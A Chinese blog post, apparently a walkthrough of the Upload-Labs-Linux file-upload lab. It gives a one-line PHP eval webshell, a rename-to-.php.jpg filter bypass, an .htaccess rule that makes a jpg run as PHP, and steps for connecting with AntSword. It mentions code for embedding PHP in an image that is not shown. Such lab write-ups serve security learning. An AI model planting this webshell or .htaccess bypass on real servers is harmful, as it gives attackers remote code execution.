当前位置: 首页 > news >正文

Upload-Labs-Linux1 使用 一句话木马

解题步骤:

1.新建一个php文件,编写内容:

<?php eval($_REQUEST[123]) ?> 

2.将编写好的php文件上传,但是发现被阻止,网站只能上传图片文件。

3.解决方法:

将php文件改为图片文件(例如:将aa.php  改为 aa.php.jpg),上传;

4.将修改好的文件重新上传,复制图片地址。

5.打开蚁剑工具,将链接粘贴到指定位置,开始破解。

6.获取对应的flag

PS:为了能够添加php文件,还可以将php文件挂载到图片上(例如:找一张jpg图片,然后运行下面代码,重新生成一张图片);然后再上传一个.htaccess文件,其代码如下:

<FilesMatch "test.jpg">  # 图片名改为要上传的图片名
SetHandler application/x-httpd-php
</FilesMatch>

http://www.lryc.cn/news/379375.html

相关文章:

  • 从 Hadoop 迁移,无需淘汰和替换
  • 深度学习:从理论到应用的全面解析
  • 【02】区块链技术应用
  • 一篇文章搞懂残差网络算法
  • 网络安全:Web 安全 面试题.(SQL注入)
  • XSS学习(绕过)
  • 深信服2024笔试
  • IOS Swift 从入门到精通:闭包 第一部分
  • 解两道四年级奥数题(等差数列)玩玩
  • 深入理解Python中的并发与异步的结合使用
  • 如何将 ChatGPT 集成到你的应用中
  • 在 Swift 中,UILabel添加点击事件的方法
  • indexedDB---掌握浏览器内建数据库的基本用法
  • 【css】如何修改input选中历史选项后,自动填充的蓝色背景色
  • 红队内网攻防渗透:内网渗透之内网对抗:网络通讯篇防火墙组策略入站和出站规则单层双层C2正反向上线解决方案
  • linux 查看进程启动方式
  • 基于Java实训中心管理系统设计和实现(源码+LW+调试文档+讲解等)
  • 第2章 Android应用的界面编程
  • springboot学习-图灵课堂-最详细学习
  • Total CAD Converter与Total Excel Converter软件分享
  • 【2024最新华为OD-C/D卷试题汇总】[支持在线评测] 启动多任务排序(200分) - 三语言AC题解(Python/Java/Cpp)
  • 【会议征稿,JPCS出版】第三届电力系统与能源技术国际学术会议(ICPSET 2024,7月5-7)
  • 【机器学习300问】118、循环神经网络(RNN)的基本结构是怎样的?
  • loveqq-framework 和 thymeleaf 整合遇到的 th:field 的坑,原来只有 spring 下才有效
  • hugging face:大模型时代的github介绍
  • 如何快速绘制logistic回归预测模型的ROC曲线?
  • 实现具有多个实现类的接口并为每个实现类定义一个名字的方法
  • Linux解压缩命令
  • 如何在 Ubuntu 14.04 上使用 Iptables 实现基本防火墙模板
  • jasypt对yml文件进行加密解密